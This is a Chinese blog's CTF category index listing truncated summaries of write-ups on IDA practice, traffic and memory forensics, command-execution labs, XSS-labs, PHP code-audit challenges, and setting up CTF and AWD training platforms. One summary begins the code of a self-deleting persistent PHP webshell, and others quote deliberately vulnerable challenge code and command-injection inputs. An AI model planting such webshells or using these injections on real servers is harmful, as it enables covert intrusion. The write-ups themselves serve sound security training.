随笔分类 - CTF
摘要:> 练习IDA两年半 打开尘封已久的bugku,从题目中练习使用,现在都已经是新版本了 orz![image.png](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang//20230821_2127155556.png) ### 入门
阅读全文
摘要:转发自小学弟的WP,有两个取证类的题目因为电脑volatility的问题就没有写在题解里了 题目资源 题目中的流量文件都放到公众号芸潘了,后台回复陇剑杯即可获得下载链接 签到题 使用wireshark打开下载下来的‘Good.pcapng’流量包 1.1此时正在进行的可能是__协议的网络攻击(htt
阅读全文
摘要:电话面试之后微信上发了四个靶场过来,做了三个靶场,记录获取flag的过程 第一题 (考点:命令执行) 浏览网站,在底部发现提示 看来是命令执行,执行一下ipconfig 执行成功,抓包继续执行ls 尝试读取footer.php shell=cat+footer.php,无回显 不确定是cat还是空格
阅读全文
摘要:关于简单部署题目请参考:https://www.cnblogs.com/Cl0ud/p/13783325.html 如果需要进行较复杂部署,可参考本篇 PHP代码审计系列题目的部署,较之前的部署方案,改变的地方除了题目代码之外,还将题目权限进行了限制,题目结构更正规化,基础镜像没有进行修改,还是原来
阅读全文
摘要:部署如DVWA或upload-labs这类综合性靶场的时候,虽然是使用Docker环境,设置好权限后容器被击穿的问题不需要考虑,但担心部分选手修改了题目环境,比如一直XSS弹窗,所以想要编写脚本每天定时刷新靶场,让靶场的可维护性更高。 第一时间想到的是使用Linux下的crontab定时任务加she
阅读全文
摘要:非常规USB流量分析 附件下载: 链接:https://pan.baidu.com/s/1Gjgj1EH9qmX0PYi21uYlDg 提取码:x9xn 先提取USB流量数据,使用工具: https://github.com/WangYihang/UsbKeyboardDataHacker 得到数据
阅读全文
摘要:给实验室同学搭建的CTFD平台用于内部训练和CTF的校赛,为了循序渐进当然是先内部出一些简单入门的题目,但是网上大部分关于CTFD平台的都只是部署,而关于题目放置的内容却很少,虽然这个过程比较简单,但还是记录一下 部署自制题目一共分为以下几步(以WEB题目为例,实际上如果是逆向,杂项,密码学这些不需
阅读全文
摘要:在某场比赛中师傅们说需要用到该工具,学习之 题目给了我们一个流量包,分析 发现 .hint.php.swp文件 该文件是使用 vim 编辑文件时异常退出而产生的,可以通过 vim -r 文件名 进行相应的恢复,但在这里我们直接跟踪流向下看 存在提示: You need to get two pass
阅读全文
摘要:开学后实验室来了几个新同学,在线上CTF方面大家一直在持续学习,但AWD模式的CTF我们练习并不多,所以准备搭建一个AWD平台用于实验室成员的线下赛攻防练习。 最开始的是防灾科技大学的线下AWD靶场: https://github.com/glzjin/20190511_awd_docker 但是靶
阅读全文
摘要:工具下载: Linux环境 apt-get install volatility 各种依赖的安装,(视情况安装) #Distorm3:牛逼的反编译库 pip install distorm3 #Yara:恶意软件分类工具 pip install yara #PyCrypto:加密工具集 pi
阅读全文
摘要:一个简单的不死马如: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325
阅读全文
摘要:CTF SHOW平台的WEB AK赛: 签到_观己 <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file
阅读全文
摘要:16-20关 第十六关 关键代码为: <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script"," ",$str); $str3=str_replace("
阅读全文
摘要:查看关键代码: <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">"
阅读全文
摘要:以前囫囵吞枣做过一遍,现在从头再来 第一关网址为:http://127.0.0.1/xss-labs-master/level1.php?name=test 而页面上显示了用户test,name可控,查看其源代码为 echo "<h2 align=center>欢迎用户".$str."</h2>";
阅读全文
摘要:30题利用提交数组绕过逻辑 本篇博客是PHP代码审计分段讲解系列题解的最后一篇,对于我这个懒癌患者来说,很多事情知易行难,坚持下去,继续学习和提高自己。 源码如下: <?php $role = "guest"; $flag = "flag{test_flag}"; $auth = false; if
阅读全文
摘要:代码审计分段讲解之29题,代码如下: <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $table = Filter($table); mysqli_query($mysqli,"desc `se
阅读全文
摘要:28题 <!DOCTYPE html> <html> <head> <title>Web 350</title> <style type="text/css"> body { background:gray; text-align:center; } </style> </head> <body>
阅读全文
摘要:后面的题目相对于之前的题目难度稍微提升了一些,所以对每道题进行单独的分析 27题 <?php if(!$_GET['id']) { header('Location: index.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_G
阅读全文
摘要:26 unserialize()序列化 <!-- 题目:http://web.jarvisoj.com:32768 --> <!-- index.php --> <?php require_once('shield.php'); $x = new Shield(); isset($_GET['cla
阅读全文